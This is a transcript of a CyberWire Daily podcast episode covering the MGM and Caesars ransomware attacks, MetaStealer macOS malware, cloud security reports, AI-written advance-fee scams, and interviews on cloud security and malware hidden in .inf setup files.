CyberWire Daily - Ransomware and materiality. MetaStealer hits businesses. Two looks at cloud risks. His Highness, the Large Language Model.
Episode Date: September 14, 2023The MGM Resorts incident is now believed to be ransomware, and how does that inform our view of Materiality of a cyber incident? MetaStealer targets businesses. Cloud access with stolen credentials. T...he cloud as an expansive attack surface. Johannes Ullrich from SANS describes malware in dot-inf files. In our Industry Voices segment Dave speaks with Oliver Tavakoli, CTO at Vectra, on the complexity and challenges of cloud service security. And welcome back, or not, Your Highness the Large Language Model, Prince of Nigeria. For links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/12/176 Selected reading. Caesars Entertainment Paid Millions to Hackers in Attack (Bloomberg) Caesars Paid Ransom After Suffering Cyberattack (Wall Street Journal) The Cyberattack That Sent Las Vegas Back in Time (Wall Street Journal) Pro Take: MGM Casino Hack Shows Challenge in Defending Connected Tech (Wall Street Journal) ALPHV Ransomware Used Vishing to Scam MGM Resorts Employee, Researchers (Hackread) FBI probing MGM Resorts cyber incident as some casino systems still down (Reuters) MGM Resorts says cyberattack could have material effect on company (NBC News) MGM Resorts cybersecurity breach could cost millions, expert says (KLAS) MGM Resorts shuts down some systems because of a “cybersecurity issue.” (Updated.) (CyberWire) macOS Info-Stealer Malware 'MetaStealer' Targeting Businesses (SecurityWeek) “Authorized” to break in: Adversaries use valid credentials to compromise cloud environments (Security Intelligence) Unit 42 Attack Surface Threat Report (Palo Alto Networks) The Nigerian Prince is Alive and Well: Cybercriminals Use Generative… (Abnormal) Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K.
Air Transat presents two friends traveling in Europe for the first time and feeling some pretty big emotions.
This coffee is so good. How do they make it so rich and tasty?
Those paintings we saw today weren't prints. They were the actual paintings.
I have never seen tomatoes like this.
How are they so red?
With flight deals starting at just $589,
it's time for you to see what Europe has to offer.
Don't worry.
You can handle it.
Visit airtransat.com for details.
Conditions apply.
AirTransat.
Travel moves us.
Hey, everybody.
Dave here.
Have you ever wondered where your personal information is lurking online?
Like many of you, I was concerned about my data being sold by data brokers.
So I decided to try Delete.me.
I have to say, Delete.me is a game changer.
Within days of signing up, they started removing my personal information from hundreds of data brokers.
I finally have peace of mind knowing my data privacy is protected.
Delete.me's team does all the work for you with detailed reports so you know exactly what's been done.
Take control of your data and keep your private life private by signing up for Delete.me.
Now at a special discount for our listeners.
private by signing up for Delete Me. Now at a special discount for our listeners,
today get 20% off your Delete Me plan when you go to joindeleteme.com slash n2k and use promo code n2k at checkout. The only way to get 20% off is to go to joindeleteme.com slash n2k and enter code
n2k at checkout. That's joindeleteme.com slash N2K, code N2K.
The MGM Resorts incident is now believed to be ransomware,
so how does that inform our view of materiality of a cyber incident?
Metastealer targets businesses.
Cloud access with stolen credentials.
The cloud as an expansive attack surface.
Johannes Ulrich from SANS describes malware in.inf files.
In our Industry Voices segment, I speak with Oliver Tavakoli,
CTO at Vectra on the complexity and challenges of cloud service security.
And welcome back, Your Highness, the large language model, Prince of Nigeria.
I'm Dave Bittner with your CyberWire Intel briefing for Thursday, September 14th, 2023.
The attack on MGM Resorts International is now generally held to be a ransomware operation, but there's some lack of clarity over which gang is responsible.
VX Underground tweeted that the AlfV ransomware gang had claimed responsibility
and that the attackers gained access through social engineering, specifically vishing.
They put it this way.
All Alfie Ransomware Group did to compromise MGM Resorts was hop on LinkedIn, find an employee, then call the help desk.
Hack Read offers a more extensive account of this attribution that's open to the possibility that the attackers may represent an Alfie subgroup.
But it seems increasingly unlikely that it was Alfie.
Other sources, Bloomberg and Reuters among them,
charged the attack to Scattered Spider,
also known as UNC-3944, a younger criminal organization,
younger both in terms of its recent appearance and the ages of its members,
some of whom are believed to be teenagers operating from the U.S. and the U.K.
Some of the confusion may arise from Scattered Spider's use of ransomware encryptors
and dump site infrastructure made available by AlfV.
AlfV has traded these on C2C markets, the FBI says, since April of 2022, at least. In this case, there may have
been some direct collaboration between Scattered Spider and AlfV. Scattered Spider has shown
considerable aptitude for social engineering, attributable in part to their vishing operators
being native speakers of English. The hospitality sector, and especially its casino subsector, has long been
more security-aware than most, but the Wall Street Journal concludes that connectivity in the industry
seems to have outrun the casino's ability to secure their systems. Recovery has involved
reversion to many long-sidelined manual systems, giving the affected casinos a curiously retro, oddly analog
vibe. Bloomberg says that Scattered Spider is believed to have been responsible for a ransomware
attack against MGM Resorts competitor Caesars Entertainment a few weeks earlier. Caesars is
expected to disclose the attack, which began on August 27th, in regulatory filings imminently. The company had
not yet done so as of this morning. Bank Info Security reports indications that Caesars paid
the ransom demand some $15 million, or half of the extortionists' demand. Moody's Investor Service
evaluated the incident and said in an assessment provided to the Cyber Wire that the incident is credit negative for MGM Resorts International.
The downtime in particular was a problem for a business that relies heavily on technology, especially when that downtime entails potential revenue losses.
MGM Resorts will also be dealing with reputational risk and any direct costs related to investigation and remediation.
There's a risk of litigation as well.
In general, Moody's regards the gaming and gambling industry as carrying moderate cybersecurity risk
because of its high degree of digitization and the large quantities of potentially valuable personal information companies in the sector tend to hold.
MGM Resorts International, in a Form 8K filed yesterday with the Securities and Exchange Commission,
warned that the incident represents a material risk to the company.
New SEC regulations require companies to disclose cyber incidents that have a material effect on a public company.
companies to disclose cyber incidents that have a material effect on a public company.
There's been much discussion of what counts as materiality, with companies having considerable latitude in reaching their own definition. The ransomware attacks on MGM Resorts and
Caesars Entertainment offer two examples of companies' judgments of materiality.
SentinelOne has published an analysis of Metastealer, a malware family
designed to target macOS. The malware is distributed via social engineering with business-themed lures.
Sentinel-1 says, this specific targeting of business users is somewhat unusual for macOS malware,
which is more commonly found being distributed via torrent sites or
suspicious third-party software distributors as cracked versions of business, productivity,
or other popular software. Once installed, the malware attempts to exfiltrate data,
particularly passwords saved in the keychain. IBM X-Force has released its 2023 Cloud Threat Landscape report, finding that 36% of
cloud security incidents in 2023 resulted from the theft of valid credentials, compared to just 9%
in 2022. IBM says X-Force engagements reveal that often credentials with overprivileged access are left exposed on user endpoints in plain text,
creating an opportunity for attackers to establish a pivot point to move deeper into the environment or access highly sensitive information.
Specifically, plain text credentials were located on user endpoints in 33% of X-Force Red's adversary simulation engagements
that involved cloud environments during the reporting period. The researchers add Microsoft Outlook cloud credentials
accounted for over 5 million mentions on illicit marketplaces, by far the most popular access for
sale. Palo Alto Networks has released its Unit 42 Attack Surface Threat Report for 2023,
finding that 80% of security exposures are located in cloud environments.
These exposures are often introduced through changes in cloud services, which occur frequently.
Palo Alto Networks says over 45% of most organizations' high-risk cloud-hosted exposures in a given month
were observed on new services that hadn't been present on their organization's attack surface
in the month prior. Thus, the creation of new publicly accessible cloud services, both intended
and unauthorized, is a risk factor related to nearly half of all high-criticality exposures at a given time.
Finally, there's a new kid on the royal block, and we're not talking about the Duchess of Sussex either.
Abnormal Security warns that cybercriminals are using generative AI tools like ChatGPT
to improve classic Nigerian print scams.
They say, spelling mistakes and grammatical errors
have long been characteristics of an attack,
making them easy to spot even if they did land in the inbox.
But with the rise of generative AI,
this is no longer the case.
Some threat actors are sending a combination
of human and AI-generated emails,
which the researchers think is an indication
that cybercriminals are still testing out the technology to determine how useful it may be for
their work. The scammers have also shifted the themes of these emails, with many of them referring
to business transactions rather than personal ones. So, you too, friend, could make a pile with a small upfront investment, or so we hear.
We pass that on without endorsement.
But seriously, it wounds us that machines do better with English than many graduates of American high schools.
Stay in school, friends, and buy the great horn spoon in the shade of Mr. Noah Webster, fellow youths.
Pay attention in your English class.
Mr. Noah Webster, fellow youths, pay attention in your English class.
And once again, remind your loved ones, there is no Nigerian prince.
Coming up after the break, Johannes Ulrich from SANS describes malware in.inf files. In our Industry Voices segment, I speak with Oliver Tavakoli,
Chief Technology Officer at Vectra,
on the complexity and challenges of cloud service security.
Stay with us.
Do you know the status of your compliance controls right now?
Like, right now.
We know that real-time visibility is critical for security, but when it comes to our GRC programs, we rely on point-in-time checks.
But get this.
More than 8,000 companies, like Atlassian and Quora have continuous visibility
into their controls with Vanta. Here's the gist. Vanta brings automation to evidence collection
across 30 frameworks like SOC 2 and ISO 27001. They also centralize key workflows like policies,
access reviews, and reporting, and helps you get security questionnaires done five times faster with AI. Now that's a new from Black Cloak.
Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform secures their personal devices, home networks, and connected lives.
Because when executives are compromised at home, your company is at risk.
In fact, over one-third of new members discover they've already been breached. Protect your executives and their families 24-7,
365, with Black Cloak. Learn more at blackcloak.io.
The migration that many organizations have made toward cloud data storage and security has brought with it an added dimension of complexity.
Managing cloud architecture, change controls,
and the basic differences between the various cloud providers
all present specific challenges and the potential for security issues.
Oliver Tavakoli is Chief Technology Officer at security firm Vectra,
and in this sponsored Industry Voices
segment, we discuss his insights on securing cloud environments. I think oftentimes what you see in
organizations is that the business need to be agile gets out ahead of the security side of
things. The security team doesn't typically want to be in the business of saying no. And so different business units go ahead and adopt some cloud systems. And then
eventually, the central security function is given the baton and asked to make sure that it's all
secure and that the business can meet its compliance mandates and that risk is mitigated
reasonably. And so oftentimes the security team,
I think, finds themselves chasing where the business is rather than laying the groundwork
in advance of the business going to cloud. Are there any common misperceptions with folks when
it comes to how they consider cloud security? Yeah, I think oftentimes cloud in general,
there's a euphemism. It's,
you know, your application running on someone else's compute or your data stored on somebody else's storage. But I think there are significant differences beyond that abstraction. And so
two key differences are, number one, from the point of view of an attacker,
each cloud system is relatively homogeneous and self-describing.
And so what that means is if I break into somebody on-prem, every environment is like its own unique snowflake.
And I have to spend a lot of time figuring out the ins and outs of how that environment is set up, what systems I can reach, how I deal with identity and stuff like that.
how I deal with identity and stuff like that.
In the cloud, if you're attacking some AWS environment belonging to a particular customer, a particular tenant,
a particular organization, it's all very homogeneous
and it's all self-described.
And once you get API access to the environment,
you can actually just ask it about the entirety of the environment
without having to spend a lot of time doing reconnaissance
and other things like that.
So that's one difference.
The second key difference is that cloud systems are definately leaky.
And so storage is an interesting example of that.
I think most people tend to think of storage as just part of the infrastructure as a service migration.
It's like, oh, yeah, I used to have my disks and now I have my storage.
You might even think of it as the equivalent of a file server that you have on-prem. The problem is that this is a file server that can be got at without going through your network.
internet and were not secured and people just downloaded gigabytes and gigabytes of data,
none of that data actually went through the network boundary of that cloud tenant,
the organization's cloud network. That's the other thing that's hard for people to get their head around, which is that all of these services, storage included, effectively have a backplane that bypasses their network controls.
Where on-prem, you could never basically exfiltrate 10 gigabytes of data without it going through the edge firewall, in this instance, you can.
And that is a new muscle to learn.
And so do folks have to adjust to this to kind of jettison that whole notion of there being a perimeter of
there being a moat around the castle? Yeah, I think you still would like to think of it as a
moat, but it becomes somewhat of a logical moat. It's like you have all the controls in place.
It's not easy to look at in one place and say, I am convinced that I have a DMZ, which is what you
would have in the old days. I know what controls I have. I know what's inbound and outbound.
Now you have a much more leaky perimeter.
You may have a concept of what you want your perimeter to be,
but there's this whole cottage industry now of checking whether the concept
of what you think your perimeter is and your actual perimeter actually match up.
So you may make unequivocally the statement that we have no
means of reaching our cloud tenant other than from our on-prem systems, and it may turn out to be a
untrue statement. So there's this whole cottage industry of external attack surface management,
which is attempting to find all the ways in which you might be leaky to the outside,
then you may not be aware.
You know, you and your colleagues there at Vectro,
when it comes to the folks that you're working with,
are there any common elements that you find for the folks who are finding success here?
Are there commonalities?
I think for the folks that succeed at this, we find that the security team has reasonable controls in place.
If the security team is chasing the rest of the business, it's really hard.
You can implement some detection capability, but ultimately it's very difficult if the rest of the business is not really committed to security.
It's committed first and foremost to agility and getting products out and getting services out.
I think when there's a balance,
when there is a reasonable balance
between the security team and the infrastructure teams
in terms of what they, infrastructure and application team
in terms of what they deploy, that's one.
I think the second one for us is that we find,
again, the security teams that have a reasonable balance in terms of prevention.
So they do some amount of cloud security posture management, but recognize that there is a lot of diminishing returns on that and have detection capabilities.
The other one that we find is more and more coming to the fore is the ability to kind of stitch these worlds together.
is more and more coming to the fore is the ability to kind of stitch these worlds together.
Attackers know that you have these series of interconnected systems.
Your cloud systems are some of those.
Your cloud identity, which is not really public cloud per se,
things like Azure AD or Okta is another element of that.
Your SaaS applications, it used to be you would run exchange servers on-prem. Now you're sending all your data to Microsoft 365 in the cloud. How are you securing those things? How
is access control to those things? I mean, we see all the business email compromise these days. A
lot of that is against cloud-hosted systems. These are more SaaS applications. And so the problem
then tends to be if you have this distributed attack surface across
on-prem, network, endpoint, and public cloud, and cloud identity, and SaaS applications,
how do you begin to stitch all of these things together? Because attackers may only leave a
certain amount of signal in any one of these places, which will make it rather difficult
to detect them there. But if you zoom out and look at the pattern across the entirety of your attack
surface, attacks become kind of more tractable and easier to find. So stitching these worlds
together is key. That is really kind of part of our XDR strategy is, you know, how do we provide
native signal for a lot of these surfaces and for the ones that we don't provide it for,
how do we import that signal and then stitch those worlds together so you don't have to. That's Oliver Tavakoli from Vectra.
And joining me once again is Johannes Ulrich.
He is the Dean of Research at the SANS Technology Institute
and also the host of the ISC Stormcast podcast.
Johannes, it's great to welcome you back to our show.
I know one of your colleagues, I believe,
has been looking at some malicious code embedded in.inf files.
What's going on here?
That was Xavier, and he came across this particular malware
that I thought was kind of interesting.
It's always amazing how attackers find new ways to deliver a malware
in ways that you don't necessarily expect
and that you don't necessarily inspect
when you're looking at attachments and such.
In this particular case, it was a.inf file.
Now, if you're a Windows user, you may have seen.inf files.
They're usually part of the setup tool that you're using to install software.
And typically, they just describe where the software is being copied to.
But everything is better with some kind of arbitrary code execution.
So they also have here something called
a run pre-setup command section.
That's a section in the INF file
that allows you to run arbitrary commands.
The idea is you may want to prepare the system,
maybe create some directories
or do something along those lines,
maybe change some settings.
So you can basically add an arbitrary PowerShell script
to these INF files.
And now if the user installs a software, or at least that's what they think they do,
and of course this works even better if you can find some benign and trusted piece of software to do this with,
all the attacker has to do is change that one section in the INF file,
and now they can download additional files.
in the INF file, and now they can download additional files.
So it's masquerading as a legit file,
and indeed may function as a legit file,
but lurking within is this malicious code.
Yeah, and then of course it's always of the social engineering aspect here. In this particular case, the additional software download installed,
they called it a corporate VPN client,
which I'm not sure if that's within the context
of a particular application.
But if you are seeing on your system,
all of a sudden, some corporate VPN client,
well, you may discard it and say,
it's probably nothing, it's probably just something
corporate IT installed for.
So what are your recommendations then
for folks to protect themselves here?
Block.inf files, I don't think there's a good reason why you should ever download one from the internet
or receive one in email.
And it's sort of that good old block list game, whack them all, yet another extension to block.
It would be nice if someone would come up with a nice allow list to only list extensions that you actually need.
That's really difficult, too.
Right, right.
All right.
Well, good insights as always.
Johannes Ulrich, thanks for joining us.
Thank you. businesses worldwide. ThreatLocker is a full suite of solutions designed to give you total control,
stopping unauthorized applications, securing sensitive data, and ensuring your organization runs safe and compliant.
This episode is brought to you by RBC Student Banking.
Here's an RBC student offer that turns a feel-good moment into a feel-great moment.
Students, get $100 when you open a no-monthly fee
RBC Advantage Banking account,
and we'll give another $100 to a charity of your choice.
This great perk and more, only at RBC. Visit rbc.com slash get 100, give 100. Conditions apply. And that's The Cyber Wire.
For links to all of today's stories,
check out our daily briefing at thecyberwire.com.
We'd love to know what you think of this podcast.
You can email us at cyberwire at n2k.com.
Your feedback helps us ensure
we're delivering the information and insights
that help keep you a step ahead in the rapidly changing world of cybersecurity. Thank you. by Liz Ervin and senior producer Jennifer Iben. Our mixer is Trey Hester with original music by Elliot Peltzman.
The show was written by our editorial staff.
Our executive editor is Peter Kilby
and I'm Dave Bittner.
Thanks for listening.
We'll see you back here tomorrow. Thank you. ease through guided apps tailored to your role. Data is hard. Domo is easy. Learn more at
ai.domo.com. That's ai.domo.com.